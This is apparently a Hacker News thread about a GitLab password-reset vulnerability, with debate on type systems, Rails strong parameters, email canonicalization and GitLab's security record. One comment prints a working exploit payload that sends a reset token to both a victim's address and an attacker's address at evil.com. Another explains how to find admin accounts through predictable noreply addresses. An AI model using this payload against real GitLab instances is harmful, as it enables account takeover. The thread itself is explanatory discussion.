I don't know the history of this bug but just want to chime in with a word about how absolutely terrifying the "associate email address with account" feature in account-based web apps is. Which, I guess that's my word: terrifying, one of the things pentesters make a beeline to mess with, with a vulnerability history stretching all the way back to the early 2000s when these features were often implemented on standard Unix MTAs that could be tricked into sending password resets to multiple addresses at once, an attack featureful web frameworks seem to have resurrected in Gitlab.
If you're a normal HN reader that found themselves interested in this story, go check your password reset feature, specifically the email association logic!
Gitlab has, as I understand it, a pretty excellent security team, which gives some sense of how hard this bug class is to avoid.
> Gitlab has, as I understand it, a pretty excellent security team, which gives some sense of how hard this bug class is to avoid.
Based on the other comment that describes how this bug works, it is completely trivial to avoid. If you use a statically typed language, you'd have to go out of your way to create this bug, and it'd stand out like a sore thumb in code review, to the extent that if I saw that I might wonder whether my coworker is actively trying to create a backdoor.
The suggestion would more be to choose the correct technology from the start. Something like Scala is 20 years old, has a massive library ecosystem since it integrates with Java, and has type inference so it basically feels like a dynamically typed language, except bugs like this can't happen. It's also high performance thanks to the JVM. I don't know what it was like when Gitlab launched in 2014, but I know it was very solid in 2017 when I started using it. Or if that feels too hipster/niche, just use Java. It's not my cup of tea, but it's boring, practical, and the developer pool is infinite.
I've written a lot of Scala, and really like the language (well, aside from them not ditching null and exceptions entirely), but years ago I stopped recommending it for new projects, especially in a corporate setting. It's hard to hire experienced Scala developers, and most Java developers I've worked with were either completely uninterested in writing Scala at all, or didn't care to learn the language well enough to actually make use of its better features, and somehow ended up writing Scala that looked like worse Java than the Java they'd usually write.
It's not actionable for Gitlab, but it's actionable for anyone weighing what technologies they should use for future projects. Use one that doesn't open you to this kind of mistake, and ignore people who talk about "productivity" because that's going to be people arguing about their gut feelings anyway, and everyone will say their chosen stack is more productive.
Something like Java is going to have the largest hiring pool, the largest ecosystem, and support from every major vendor. I don't particularly like it and think that Scala is pretty much a straight upgrade, but Java's a smart choice.
You get that the track record of Java and Java frameworks on web vulnerabilities is pretty abysmal, right? There's a whole gigantic RCE bug class (RCE! in the 2020s!) that originates there.
My general take is: glass houses, etc. And: everybody is in a glass house.
I'm not sure what you mean with the bug class; Java serialization? If so I think that's been something where common advice is not to use it for 20+ years.
Maybe Spring has had issues. Like I said I don't actually like Java and all the annotation stuff. I avoid it, but it's still going to be one of the more robust choices you can make since every major enterprise uses it. Java had log4shell, which was pretty bad, and probably wouldn't have happened if Java had had string macros. It's one of the reasons why Scala is a better language: people use things like compile time macros which prevents those sorts of mistakes. It looks like akka-http for example has only had DoS vulnerabilities (e.g. getting zip bombed) + some niche stuff like request smuggling if you used it to build a reverse proxy or usage of directory listing on Windows.
That said, sure, large frameworks all have bugs. But not being able to tell whether you are dealing with a string or an array in your business logic is just silly.
If you like Java, use Java. Don't worry about people pointing out how gnarly the security track record is; the security track record of every popular thing is gnarly. I'm not here to tell you what framework to use, only that empirically, you're not going to improve your odds significantly by choosing a different mainstream framework.
I don't like Java and I don't consider jobs where I'd be doing a nontrivial amount of Java. But the original comment I replied to said this class of bug is hard to avoid, and it's not. Use any statically typed language, and it can't happen. Java's the obvious choice. C# is probably fine too.
Same with something like SQL injection or log4shell. These are also preventable using string formatting macros. If `DatabaseConnection.run` takes a `SqlQuery`, not a `String`, and you can only make a `SqlQuery` through a safe API, and your escape hatch is a macro that does query parameterization instead of string substitution, then your users can't get it wrong. This is how Scala libraries actually work and have worked for years. Similarly if you build your logging library to take MDC objects that are built with format macros. These are solved problems.
This is a logic bug, not a typing bug. One clear way you know this is: this bug occurs in both Java and C# applications, routinely. But that's OK! I'm not going to dunk on you for using C#, even though it is practically the ground spring from which all web app vulnerabilities have emerged (you'd think it'd be PHP, but C# has a better claim to the title).
Typing bugs are just logic bugs that you were able to encode into the type system, and therefore the checker is able to reject for you. Types are propositions and values are proofs. This is not just an academic fact; my SqlQuery example is a direct practical application.
The claims being SQL injection is a problem with a known solution, that Scala does it right, and that it's an example of turning logic errors into type errors.
Please do not put C# into the category of languages that have issues with SQL injections - pushing raw unparametrized SQL through EF Core in the past required going out of your way to use explicitly discouraged API prefaced with warnings.
Today, it has been superseded by FromSql which uses string interpolation API so that it is transformed into safe parametrized queries without any explicit action from the user.
Good to hear. Java also recently added the ability to make custom string interpolators with that exact use-case in mind. I know C# has LINQ, which is similar to query monads in Scala, but IMO using string interpolators tends to be cleaner for more complex queries.
Right now I'll just say that from 2005-2015, Java and C# applications were literally the bread and butter of every application security shop (house accounts for web appsec firms were Fortune 100 companies that built all their line of business apps in those two languages), and password reset bugs wereo one of the first place you'd look. I think I even included password reset in a "Seven Deadly Features" blog post I wrote at Matasano.
None of that is a reason to avoid C#! I'm not trying to say that using the two most fertile sources of web application security vulnerabilities over the last 20 years is per se a bad decision!
It doesn't sound like they have a great security team, they added the "Associate a secondary email address" feature recently. This isn't something that has always been in the software. It seems more like they were cutting corners and not properly testing through ways to exploit their own new feature when it was related to account security.
On top of that it looks like they had a 9.6 CVE that allowed integrations to perform commands as other users...
From the outside it looks like they are trying to ship features faster than they can keep them safe and tested. Perhaps because they are having an incredibly difficult time monetizing well? It makes sense from business standpoint in some respects, but also the security stuff could just absolutely tank the business when the whole point of a (self)hosted git solution is essentially just account management.
I don't put much stock in this "9.6" stuff; CVSS is a ouija board that will say whatever people want it to say. But regardless: the best security teams in the world still see critical vulnerabilities in their software, because software is all garbage.
I've recently stopped two design choices in external facing resources that posed significant security risks.
One of which was around credentials resetting to emails that aren't stored in the API auth system itself, but rather come into Salesforce as a support case. "Don't worry, a support team member has to action the request" was meant to be reassuring, until I explained that this translated to "the only mechanism in place to prevent credentials being stolen comes with a massive social engineering vulnerability".
But it's the previous choices I haven't come across yet that worry me.
A few years ago there would be people defending GitLab for “transparency” every time something went wrong.
They even went overboard with the transparency and made public some slack conversations which for me would have made it one of the worst places to work.
> It doesn't sound like they have a great security team
That's an unfair comment. Even the best teams ship bugs. If you want to measure the quality of a security team, you look at their performance trajectory (for both detection and response) relative to the size of their total threat surface.
All i needed to know about the quality of software gitlab ships can be found in using their CI system on any half decent size project. You can tell it was half baked with many bugs and edge cases that can be easily avoided. When you look at the bug tracker all of them have been documented for years and they just ignore them.
My favorites are
* using included files that run no job is a failure. The only real work around is adding a noop job all over your ci system.
* try to use code reviewers based on groups. The logic is so complex and full of errors i can’t even explain it unless i spend an hour reading the docs.
* when using the merge train and enabling merge result pipelines you end up with two different jobs per commit. This is cool except in the UI it always shows merge results first. If you have ten commits you need to look on the second page to find the most recent commits ci jobs. That is just annoying but more no environment variables overlap for what MR or commit it is. This makes doing trivial things like implementing break glass pipless almost impossible.
Anyway gitlab sucks i wanted to not use github but really it’s just bad. Not to mention we have outages monthly that we always know of 30 minutes to an hour before gitlab does then we look on the status page and see the downtime is 10 minutes when its been 40 for us and likely everyone else. We have in the last year had close to 2 full days combined of downtime from gitlab. Of course they report 99.95% uptime.
github post Microsoft was also a major pain to add code review for groups that were not a per-project, manually curated list of users.
there were some "addons" like panda something that made it less worse, but still a crap fest in terms of usability and compliance.
not to mention that now you can barely use it without being logged in. im overall glad to have moved to gitlab and codeberg. do not miss github AT ALL.
What a strange perspective. If not e-mail, then what would you associate it with? I've been running a site for over 20 years with a large user base. We initially used usernames, but it was disastrous. Everyone knew each other's usernames, making it easy to attempt brute force attacks on passwords, reset them, etc. Using e-mails isn't the problem, the issue is overcomplicating the login and password recovery logic, tons of abstraction everywhere, overengineering, people rushing to push code without proper checks in security sensitive parts etc.
> Gitlab has, as I understand it, a pretty excellent security team, which gives some sense of how hard this bug class is to avoid.
You should examine the history of security issues on GitLab. There are critical exploits multiple times a year, requiring an urgent upgrade of your GitLab distribution. Gitlab is the worst product I've used security wise.
You took the wrong thing away from the comment. I'm not saying you shouldn't do email password resets. We do. Everybody does. I'm saying: be ultra careful with that code.
Gitlab is both open source and has an on-prem product, so my guess is that you're simply hearing about more of the Gitlab bugs than you would with a comparably sized competitor.
> Gitlab is both open source and has an on-prem product, so my guess is that you're simply hearing about more of the Gitlab bugs than you would with a comparably sized competitor.
It seems you might not be using their on-premises product, considering your guesswork. We used it for years and it was a nightmare. Almost every upgrade was problematic, and we often had to scour through GitLab issues to find solutions from other users. These solutions were often makeshift and carried the risk of causing further issues. Their salaries are below market rate, which reflects in the quality of staff they hire (there are few exceptions). I prefer not to point fingers, so I won't link to any specific discussions from GitLab. It's worth noting that they have a culture of open discussion, and from what I've observed, the engineering quality in some of the teams was quite low. We utilize numerous other large scale open source projects in our stack and have never encountered as many problems as we did with GitLab.
What guesswork? I use Github. My point is that you don't hear about most vulnerabilities in SAAS products, because there is no norm of disclosing them. BUt disclosure is unavoidable for open source on-prem products.
> My point is that you don't hear about most vulnerabilities in SAAS products, because there is no norm of disclosing them. BUt disclosure is unavoidable for open source on-prem products.
I already addressed that point, explaining that we use other on-premises open source products of similar size, and GitLab was the poorest in terms of quality. I haven't drawn any comparisons between GitLab's on-premises and SaaS products, so I'm puzzled as to why you continue to 'guess' the reasons behind our experiences, especially when those guesses have been evidently incorrect.
What's your deployment model? I've had it deployed on Kubernetes for 100 users since June 2019 and it's been painless. We upgrade every month, it's usually just a helm upgrade gitlab/gitlab -f values.yaml
Once a year they do a major release, usually around May, and I need to upgrade Postgres or Redis but that's the extent of it.
I tend to agree. Regarding Gitlab, there’s a bit of a dichotomy here. On one hand it’s good that they’re diligently catching and patching these things quickly and effectively notifying with transparency, that’s a great thing. On the other hand, it means Gitlab is an absolute nightmare to maintain, the process to upgrade it is not always trivial and to add to that, consistently, the day after a Gitlab upgrade a critical vulnerability is found and patched.
Every product has security issues and what should worry you more, things that never see security patches or something that does?
Gitlab upgrades, omg that was a nightmare, so many broken upgrades, there are literally thousands of issues on their issue tracker only about problems with upgrades.
Yeah, every single time I get a spurious password reset email (presumably from someone trying to hijack my account), I'm worried they've somehow managed to add an unauthorized recovery email address outside of my control. It hasn't yet happened to me, but as we can see from this story, it is absolutely possible unfortunately.
I can't remember getting something like that. Maybe because I use a different e-mail address for signing up to services than for regular communication.
I just had an idea, maybe using a + alias (yourname+some-alias-address@example.com, made famous by gmail) could help against attackers. Even if they find out your email they will never guess the part after the plus. If you forget it though then you can't reset your password anymore either.
> If you forget it though then you can't reset your password anymore either.
If you struggle with memorizing your username/email, there's a near zero chance you're using a password manager, which also means there's a near zero chance you're using decent passwords for your logins, in my experience.
It happened more than once that I didn't store a login to the password manager correctly. Either mixed up something while editing, or forgot to save it at all, or accidentally deleted an entry, and only noticed years later (long after old backups were overwritten).
Or it could open you up to other attacks when the service coalesces all those emails to one canonical example (to uniquely identify you or whatever -- note that almost no online service recognizes the importance of caps in the email address you use as a username for example, where the underlying email provider sometimes does) but does so differently than the actual email service, allowing anyone and their dog to create an email which will collide with yours.
Allowing anything else that a-z 0-9 and some characters like - _ . as the name part of an email address is pure madness. If the mail provider treats User@domain as a different address than user@domain, and delivers them to different customers this is simply asking for trouble. Even if it's standard compliant behavior.
As a less contrived example then, consider "andix.hacker@foo.com" vs "andix..hacker@foo.com". Some email service providers canonicalize those to the same thing, and some don't.
Your service using emails for logins or adspam or whatever now faces a choice. You probably have to accept periods, and you probably don't want to try to hard-code all the different ways a period might be used legitimately as opposed to a typo, so you have to deal with that problem somehow. You can canonicalize (opening yourself up to hijacks, some unintentional as legitimate users just have emails that clash in your system), or not (potentially locking out some users).
Actually, I find the gmail features the opposite of helpful, because websites aren’t aware of them, and will happily treat as unique addresses using them, that in fact aren’t. I have my username @ gmail (since very early days, when you needed an invite). At least once a week I get somebodies receipt of confirmation because they enter an email like tyler.e@
This could happen when the owner of a domain loses or drops it, and a bad actor picks it up.
All they have to do is set up a SMTP server and wait for junk mails, thereby learning about the e-mail addresses. Say Walmart sends some flyer. Poof, they have that user's e-mail, and the fact they are registered with Walmart.
I'm guessing here, because I only read a high-level description of it, but I think it's a password reset flow endpoint that takes the email address to look up and send a reset to, and the framework will accept an array instead of a simple string; the endpoint looks up the first address, but the variable used to determine who to send the reset mail to is the array. Again: just a guess as to the underlying bug (I've seen that specific bug before is why I guessed).
The vulnerability lies in the management of emails when resetting passwords. An attacker can provide 2 emails and the reset code will be sent to both. It is therefore possible to provide the e-mail address of the target account as well as that of the attacker, and to reset the administrator password.
Here's an example payload:
user[email][]=my.target@example.com&user[email][]=hacker@evil.com
Strong parameters has been a core security feature of rails for a long time, and all the guides go into detail about the boilerplate you need just to accept a form input past the strong parameter filters. It's weird to me that the pattern doesn't also include a "must he a string" option. I know you can add to_s everywhere, but making it part of the existing strong params would actually incentivise use.
It's weird, as I recall with strong params one of the only things it really makes you decide is whether a value is a scalar, array, or Hash. You can certainly allow a value to be scalar or array, but it's not very natural in strong params.
I mostly hate the way strong params gets used - it's a bad compromise between letting Ruby people do Ruby things and trying to plug up a category of vulnerability that's been biting rails apps for a decade. Now I do all my api definitions in openapi and it's way easier. I haven't tried it with a rails app but I think it'd work well there.
This is such a rarely used feature that I wonder if it would be helpful to have a CSP or preflight header that restricts the browser from sending multiple values for the same parameter.
It's a great feature that's been supported by browsers for decades. <select multiple> uses it. You can use it for checkboxes to select multiple items too.
If you changed it now you would break a whole lot of stuff.
You wouldn't need to change it. But if you made it a CORS header like Access-Control-Allow-Headers, then websites would be able to provide a default policy forbidding it so that their code that actually requires it would need to explicitly opt into the behavior.
There is precedent for deputizing the browser to stop this kind of bug with Access-Control-Allow-Headers. If the backend wants to default to ignoring multiple GET/POST parameters with the same name, then the browser could helpfully fail to make a request that attempts to send them.
The attacker doesnt’t use a compliant browser to make the request. User agent protections only help in situations where a regular user (or their software) is being tricked
Properly used white list parameter controls (i.e., strong parameters) that are the default Rails behavior at this point would have prevented this bug completely.
This is a little like saying the best way to avoid this bug is to not have the bug. But that's true of all bugs. The C apologists used to say, "just bounds check properly!"
Content Security Policy is a User-Agent feature. The vulnerability here is server-side. A malicious actor exploiting this will be using their own HTTP client that does not respect a CSP.
I think I'd count that as a bug and a design error.
The bug is accepting an array when it should only take a scalar.
The design error is that the endpoint should not be taking email addresses at all. It should take account IDs.
Even if a system uses email addresses as account IDs they are conceptually not the same and the code should not muddle them.
Keep them separate and then even if you get an "allows an array where it should have been a scalar" bug the result should be either just the first account in the array gets a reset email or all the accounts in the array that are existing accounts get reset emails for their accounts.
If they have to allow lookup by email I don't understand why they wouldn't throw out the input data. They should only ever have had a function to send password reset that takes a user ID and uses the email on record from the database.
I think it is OK to call the account ID "Email Address" on everything the user sees, and make it the same string as the user's email address. As far as the user is concerned they login with email address and password.
I'm just saying that in the software and in the database store account ID and email separately. Treat the fact that the account ID column matches the email address column as just a coincidence that you do not take advantage of.
I'd enforce not taking advantage of it by having employee accounts actually use an account ID that does not match their email address, such as their name, so that if we accidentally leave out a call to EmailFromAccountID(...) somewhere and try to use an account ID directly as an email address it will break employee accounts.
Also, it is not clear to me that even with user visible account ID that is not the same as email address that it would take two email rounds trips.
The reset page could take email address, not account ID. The reset endpoint could then look up the account ID from the email address, and initiate the reset, calling the SendEmailToAccount service with the account ID to send the email. That service would look up the email address for the account.
Oh, sure. Storing the email address in a canonical column and using the provided address as a key helps. But I think the underlying bug is still there, because the email code will still _accept_ the user input if you feed that to it.
Personally, I like when people have usernames, and have to enter those, to receive a recovery message sent to the associated email.
Or better yet, enter both username and email together.
Because it's more likely the attacker won't know both.
In any event, I have been recommending to everyone for years to use email aliases (that GMail and others support) as your login. Have a different one for each site, for example yourname+az@gmail.com for amazon. That way, you can avoid crap like this which is out of your control, since the attacker won't even be able to repeat your login email: https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking...
> Gitlab has, as I understand it, a pretty excellent security team, which gives some sense of how hard this bug class is to avoid.
I disagree. It's a bonehead mistake to send password resets out to tainted email addresses. As this was an authentication change it should have received extra scrutiny and so have been even harder to introduce.
Something is wrong with their engineering culture that needs correcting.
Every time we get a story about a vulnerability, we get comments about how they're indications that engineering cultures need correcting. All I'll say is, the impression one gets is that every engineering culture needs correcting. I buy it!
From my experience people say “engineering culture” when what they actually mean management culture. It’s not typically the engineers that are the problem.
- recoverable.send_reset_password_instructions(to: email) if recoverable&.persisted?
+ recoverable.send_reset_password_instructions if recoverable&.persisted?
haha the first thing i would've caught in the initial PR was the file name... and the default setting of `confirmed: true`... seems like a big oversight or possibly an inside job (if im being conspiratorial)
Initially a single email could be passed into the API/form call and they would look it up. If found they would send a recovery to that email but it was the email the user supplied not what was in the DB.
Oh, no problem we looked it up so they are the same!
But then the ability to look up accounts from a list of emails was added. If any email matches the account lookup would succeed. Then they sent the reset link to that same user supplied value but OH NOEHS IT'S AN ARRAY NOW AND SOME MIGHT NOT HAVE MATCHED ACCOUNT EMAILS!
So they ended up sending out reset links to a tainted list of emails.
Rails "concerns" are the worst IMHO anyway, but looks like they aren't using strong params here either which is even worse. Also someone thought it was more elegant to reuse the tainted value which is par for the RoR course.
I got hit by this, we also noticed it being used with a second “feature” that exposed us a bit more than it should have.
Basically a requirement for this attack is to know the email of the user you want to reset, but, there is a hidden email address that is tied to your gitlab userid (a number incrementing from 1).
Since its a safe bet that ID 1 or 2 is an admin: thats a good target.
the email is something like 1-user@mail.noreply.<gitlabhost>.
E-mail password reset is a security nightmare even when implemented correctly.
And the worst part: On most services you can't even disable it, the only way around is often only Enterprise SSO.
On some services you can set up a phone number for SMS token instead. But I've never seen the possibility to require both. Password reset only with e-mail AND SMS token.
There's really nothing about the e-mail system that makes it particularly good for anything secure at all.
- Easy to accidentally forward confidential tokens
- Validation of email sender authenticity is still piecemeal, and there are relatively frequently ways to bypass or work around validation.
- Mail is not end-to-end encrypted. I hope that it's at least encrypted with TLS, but last time I actually messed with talking directly to an MX, it seemed like TLS was still limited to smart relays, and actual mail delivery always went to port 25 as usual...
- The cardinality of e-mail addresses is not really defined anywhere. Gmail has plus addressing and ignores periods for the purposes of delivering an e-mail. Meanwhile, Google Workspace defaults to not ignoring the periods. Pretty sure some mailbox providers are case-sensitive and others are not. This means you can't know if an e-mail address at a given provider is unique. Best bet is to treat the entire damn address as a bag of bytes, but that opens up room for UX issues of all sorts, so it's hard to balance.
- It's bad that if your e-mail address gets compromised, any account you have that doesn't have some kind of secure 2FA is literally seconds away from being compromised, too. Obviously, this is not a limitation that is limited to e-mail addresses, people wrongly treat SMS as secure, too. The thing with e-mail addresses though is that they're easier to treat as secure because it is somehow still less of a crapshoot than cell carrier security, and also because literally the majority of online accounts can be stolen with just access to the user's email address, and it can be done quickly and easily, and in many cases it can be hard to convince support that you are the correct owner afterwards.
First because email is not a secure form of communication, many ways where email content could be leaked. Sending a password reset link via email is similar to sending passwords or credit card information via email. Funnily that is something nobody is doing, because it's considered unsafe.
And second because hijacking someone's email account opens up a lot of different services to the attacker. 2FA over imap is still not a thing with most services/clients. Some people log into their webmail with username&/password on untrusted devices, ...
Ruby on Rails accepts arrays as parameters to the ORM's ".where(...)", which means "OR" between the array values. So if the code does something like "User.where(name: name, password: password)", I could totally see this happening.
I work for a huge government owned telco and our networking guys are the best. They keep us server guys in line. So even though they did expose our Gitlab to an extent, for certain external projects and consultants, you still can't visit it from the internet freely.
And also we manage users in AD so there is no SMTP connection to even do password resets.
But we really need to enforce more 2FA, we've left it up to each project to enforce their own rules on 2FA.
Especially something like Gitlab might benefit a lot from external integrations that need to call the Gitlab API. It might be possible to whitelist exactly those requests, but also a bit cumbersome.
Sorry, it is really easy to automate Gitlab updates. Just one option is to use Gitlab in Docker+Compose, which works rock-solid, and have Watchtower (e.g.) do the updates daily. I have two Gitlab servers that do this since 7+ years and no issue whatsoever. Looking around, I see so many outdated Gitlabs - what are the administrators doing?
Can we please stop pretending that Ruby/Rails is in any way a good choice for software that needs to be safe?
I do understand that it is what it is and GitLab has to deal with it, but going forward, can we stop pretending a language and framework that prioritizes cleverness and hidden control flow is better than something more boring?
If I sound overly-annoyed it's because I have to work on a production Ruby codebase where I can absolutely see a scenario in which we have similar issues just waiting to be exploited, because someone thought seventeen layers of abstraction made the code super extensible.
Any language or framework that lets the caller specify if a parameter may be a string or an array of strings should probably be avoided, IMO. The cost of this one error likely outweighs the total value realized by use of the feature.
I think that magic links are a decent alternative, as are passkeys (for web) or similar (for non-web). SSO is fine, but just centralizes the problem (like magic links do).
I just see adoption of any of these taking a long time.
SSO centralizes the problem to somewhere that can require hardware-based auth, e.g. passkey, Yubikey, etc. Passwords are fine if they're combined with hardware-based auth. Expecting every vendor to implement passkeys etc. natively isn't going to happen.
If you're a normal HN reader that found themselves interested in this story, go check your password reset feature, specifically the email association logic!
Gitlab has, as I understand it, a pretty excellent security team, which gives some sense of how hard this bug class is to avoid.